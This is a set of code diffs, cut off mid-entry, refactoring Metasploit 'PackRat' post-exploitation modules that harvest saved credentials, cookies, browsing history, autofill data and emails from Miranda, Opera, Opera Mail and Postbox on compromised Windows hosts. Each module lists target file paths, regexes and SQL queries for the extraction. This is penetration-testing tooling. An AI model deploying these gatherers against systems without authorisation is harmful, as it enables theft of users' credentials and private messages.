+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        },
+        'artifacts' =>
+          {
+            application: 'miranda',
+            app_category: 'chats',
+            gatherable_artifacts: [
+              {
+                filetypes: 'logins',
+                path: 'AppData',
+                dir: 'Miranda',
+                artifact_file_name: 'Home.dat',
+                description: "Miranda's multi saved chat protocol Username, (coded Passwords)",
+                credential_type: 'text',
+                regex_search: [
+                  {
+                    extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+                    extraction_type: 'credentials',
+                    regex: [
+                      '(?i-mx:password.*)',
+                      '(?i-mx:username.*)'
+                    ]
+                  },
+                  {
+                    extraction_description: 'searches for Email TO/FROM address',
+                    extraction_type: 'Email addresses',
+                    regex: [
+                      '(?i-mx:to:.*)',
+                      '(?i-mx:from:.*)'
+                    ]
+                  }
+                ]
+              }
+            ]
+          }
+      )
+    )
 
     register_options(
       [
@@ -70,8 +78,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -83,10 +92,8 @@ class MetasploitModule < Msf::Post
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
       run_packrat(userprofile, module_info['artifacts'])
-
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/miranda.rb
+++ b/modules/post/windows/gather/credentials/miranda.rb
@@ -10,6 +10,40 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'miranda',
+      app_category: 'chats',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Miranda',
+          artifact_file_name: 'Home.dat',
+          description: "Miranda's multi saved chat protocol Username, (coded Passwords)",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
     super(
       update_info(
@@ -35,40 +69,7 @@ class MetasploitModule < Msf::Post
           'Stability' => [CRASH_SAFE],
           'Reliability' => [],
           'SideEffects' => []
-        },
-        'artifacts' =>
-          {
-            application: 'miranda',
-            app_category: 'chats',
-            gatherable_artifacts: [
-              {
-                filetypes: 'logins',
-                path: 'AppData',
-                dir: 'Miranda',
-                artifact_file_name: 'Home.dat',
-                description: "Miranda's multi saved chat protocol Username, (coded Passwords)",
-                credential_type: 'text',
-                regex_search: [
-                  {
-                    extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
-                    extraction_type: 'credentials',
-                    regex: [
-                      '(?i-mx:password.*)',
-                      '(?i-mx:username.*)'
-                    ]
-                  },
-                  {
-                    extraction_description: 'searches for Email TO/FROM address',
-                    extraction_type: 'Email addresses',
-                    regex: [
-                      '(?i-mx:to:.*)',
-                      '(?i-mx:from:.*)'
-                    ]
-                  }
-                ]
-              }
-            ]
-          }
+        }
       )
     )
 
@@ -78,7 +79,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/opera.rb
+++ b/modules/post/windows/gather/credentials/opera.rb
@@ -129,7 +129,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/opera.rb
+++ b/modules/post/windows/gather/credentials/opera.rb
@@ -9,111 +9,119 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'opera',
+      app_category: 'browsers',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Opera Software',
+          artifact_file_name: 'Login Data',
+          description: "Opera's sent and received emails",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports SRware's Login data",
+              sql_table: 'logins',
+              sql_column: 'action_url, username_value'
+            }
+          ]
+        },
+        {
+          filetypes: 'cookies',
+          path: 'AppData',
+          dir: 'Opera Software',
+          artifact_file_name: 'Cookies',
+          description: "Opera's Cookies",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports SRware's Login data",
+              sql_table: 'cookies',
+              sql_column: 'host_key, name, path'
+            }
+          ]
+        },
+        {
+          filetypes: 'web_history',
+          path: 'AppData',
+          dir: 'Opera Software',
+          artifact_file_name: 'Visited Links',
+          description: "Opera's Visited Links",
+          credential_type: 'database',
+          sql_search: [
+            {
+              sql_description: 'Database Commands which exports ',
+              sql_table: 'cookies',
+              sql_column: 'host_key, name, path'
+            }
+          ]
+        },
+        {
+          filetypes: 'Email',
+          path: 'AppData',
+          dir: 'Opera Software',
+          artifact_file_name: 'Session*',
+          description: 'Emails stored in session file',
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:email=.*)',
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'personal infomration',
+          path: 'AppData',
+          dir: 'Opera Software',
+          artifact_file_name: 'Web Data',
+          description: 'Auto filles sotred in the database',
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: 'Database Commands which exports stored auto-fill data',
+              sql_table: 'autofill',
+              sql_column: 'name, value'
+            }
+          ]
+        }
+      ]
+    }.freeze
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Opera credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-        This is a module that searches for Opera credentials on a windows remote host.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "opera",
-                          "app_category": "browsers",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "Opera Software",
-                              "artifact_file_name": "Login Data",
-                              "description": "Opera's sent and received emails",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports SRware's Login data",
-                                  "sql_table": "logins",
-                                  "sql_column": "action_url, username_value"
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "cookies",
-                              "path": "AppData",
-                              "dir": "Opera Software",
-                              "artifact_file_name": "Cookies",
-                              "description": "Opera's Cookies",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports SRware's Login data",
-                                  "sql_table": "cookies",
-                                  "sql_column": "host_key, name, path"
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "web_history",
-                              "path": "AppData",
-                              "dir": "Opera Software",
-                              "artifact_file_name": "Visited Links",
-                              "description": "Opera's Visited Links",
-                              "credential_type": "database",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports ",
-                                  "sql_table": "cookies",
-                                  "sql_column": "host_key, name, path"
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "Email",
-                              "path": "AppData",
-                              "dir": "Opera Software",
-                              "artifact_file_name": "Session*",
-                              "description": "Emails stored in session file",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:email=.*)",
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "personal infomration",
-                              "path": "AppData",
-                              "dir": "Opera Software",
-                              "artifact_file_name": "Web Data",
-                              "description": "Auto filles sotred in the database",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports stored auto-fill data",
-                                  "sql_table": "autofill",
-                                  "sql_column": "name, value"
-                                }
-                              ]
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Opera credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Opera credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -121,8 +129,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -133,11 +142,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/operamail.rb
+++ b/modules/post/windows/gather/credentials/operamail.rb
@@ -9,86 +9,94 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'operamail',
+      app_category: 'emails',
+      gatherable_artifacts: [
+        {
+          filetypes: 'chats_image',
+          path: 'AppData',
+          dir: 'Opera Mail',
+          artifact_file_name: 'wand.dat',
+          description: "Opera-Mail's saved Username and Passwords",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'email_logs',
+          path: 'LocalAppData',
+          dir: 'Opera Mail',
+          artifact_file_name: '*.mbs',
+          description: "Opera-Mail's Emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Operamail credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for Operamail credentials on a windows remote host.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "operamail",
-                          "app_category": "emails",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "chats_image",
-                              "path": "AppData",
-                              "dir": "Opera Mail",
-                              "artifact_file_name": "wand.dat",
-                              "description": "Opera-Mail's saved Username and Passwords",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "email_logs",
-                              "path": "LocalAppData",
-                              "dir": "Opera Mail",
-                              "artifact_file_name": "*.mbs",
-                              "description": "Opera-Mail's Emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Operamail credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Operamail credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -96,8 +104,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -108,11 +117,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/operamail.rb
+++ b/modules/post/windows/gather/credentials/operamail.rb
@@ -104,7 +104,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/postbox.rb
+++ b/modules/post/windows/gather/credentials/postbox.rb
@@ -10,320 +10,327 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'postbox',
+      app_category: 'emails',
+      gatherable_artifacts: [
+        {
+          filetypes: 'received_emails',
+          path: 'AppData',
+          dir: 'PostboxApp',
+          artifact_file_name: 'INBOX',
+          description: "Postbox's received emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'sent_emails',
+          path: 'AppData',
+          dir: 'PostboxApp',
+          artifact_file_name: 'SENT*',
+          description: "Postbox's sent emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'email_logs',
+          path: 'AppData',
+          dir: 'PostboxApp',
+          artifact_file_name: '*.msf',
+          description: "Postbox's email logs",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'email_logs',
+          path: 'AppData',
+          dir: 'PostboxApp',
+          artifact_file_name: 'Archive.msf',
+          description: "Postbox's Archive logs",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'email_logs',
+          path: 'AppData',
+          dir: 'PostboxApp',
+          artifact_file_name: 'Bulk Mail.msf',
+          description: "Postbox's junk emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'draft_emails',
+          path: 'AppData',
+          dir: 'PostboxApp',
+          artifact_file_name: 'Draft.msf',
+          description: "Postbox's unsent emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'received_emails',
+          path: 'AppData',
+          dir: 'PostboxApp',
+          artifact_file_name: 'INBOX.msf',
+          description: "Postbox's received emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'sent_emails',
+          path: 'AppData',
+          dir: 'PostboxApp',
+          artifact_file_name: 'Sent*.msf',
+          description: "Postbox's sent emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'sent_emails',
+          path: 'AppData',
+          dir: 'PostboxApp',
+          artifact_file_name: 'Sent.msf',
+          description: "Postbox's sent emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'email_logs',
+          path: 'AppData',
+          dir: 'PostboxApp',
+          artifact_file_name: 'Templates.msf',
+          description: "Postbox's template emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'deleted_emails',
+          path: 'AppData',
+          dir: 'PostboxApp',
+          artifact_file_name: 'Trash.msf',
+          description: "Postbox's Deleted emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Postbox credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-       This is a module that searches for Postbox credentials on a windows remote host.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "postbox",
-                          "app_category": "emails",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "received_emails",
-                              "path": "AppData",
-                              "dir": "PostboxApp",
-                              "artifact_file_name": "INBOX",
-                              "description": "Postbox's received emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "sent_emails",
-                              "path": "AppData",
-                              "dir": "PostboxApp",
-                              "artifact_file_name": "SENT*",
-                              "description": "Postbox's sent emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "email_logs",
-                              "path": "AppData",
-                              "dir": "PostboxApp",
-                              "artifact_file_name": "*.msf",
-                              "description": "Postbox's email logs",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "email_logs",
-                              "path": "AppData",
-                              "dir": "PostboxApp",
-                              "artifact_file_name": "Archive.msf",
-                              "description": "Postbox's Archive logs",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "email_logs",
-                              "path": "AppData",
-                              "dir": "PostboxApp",
-                              "artifact_file_name": "Bulk Mail.msf",
-                              "description": "Postbox's junk emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
